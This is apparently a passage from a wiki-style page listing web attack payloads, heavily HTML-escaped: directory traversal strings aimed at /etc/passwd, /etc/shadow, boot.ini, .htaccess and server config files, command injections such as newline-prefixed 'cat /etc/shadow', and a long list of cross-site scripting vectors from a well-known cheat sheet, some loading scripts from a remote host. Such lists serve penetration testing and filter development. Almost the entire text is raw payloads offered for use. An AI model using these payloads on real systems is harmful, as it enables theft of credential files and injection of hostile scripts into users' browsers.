%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
